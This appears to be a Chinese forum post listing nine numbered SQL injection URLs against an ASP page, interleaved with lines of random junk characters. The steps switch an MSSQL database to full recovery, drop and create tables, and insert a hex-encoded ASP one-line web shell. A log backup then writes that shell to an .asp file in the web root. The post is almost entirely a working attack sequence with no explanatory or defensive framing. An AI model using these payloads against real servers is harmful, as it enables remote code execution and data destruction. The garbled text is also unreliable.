第一步
# E; N3 o! O. }5 s# i5 i0 khttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
' A: W v v ~& T# a+ V. D
y! x* [3 n; _$ @第二步:/ ~1 ]3 s8 J2 {0 f) q
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& q" P( s) E+ G7 o1 l& i4 D s ?1 @( v
第三步
5 n* a/ v- ^$ z2 |4 A$ Ihttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--( Z% x- ?( o1 Y5 j
. R. n! J& t' j第四步: y2 r Q* r1 E; _; t6 L# X4 N
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--% L1 J" e/ D# Z7 B. G% ^2 ^+ c8 G
- J( b! U& V* S: _ ]3 @第五步; V2 I" V/ Z7 z5 E" `: O( z
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
) E3 ~( p" g) ?+ |* K! M0 K a* V# ]$ ^, e6 [# B
第六步$ s- q# O* t( l. a# {
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
( a3 L, n. M0 d& W( ~3 }
7 b! h, T4 ~7 M* z. l第七步
' O3 n# O* ~2 hhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
- m, z4 \0 ^9 z w# o# \2 a( L+ R! R
# {/ }; |. _" d4 g( c) M第八步* z+ k! \" D# E+ l; e- M
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
' V @; X* m2 S7 `7 L
6 `1 W" ^# C* a( G第九步5 ~7 f. _# E% b8 h
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
1 k/ L+ P U8 h2 ? |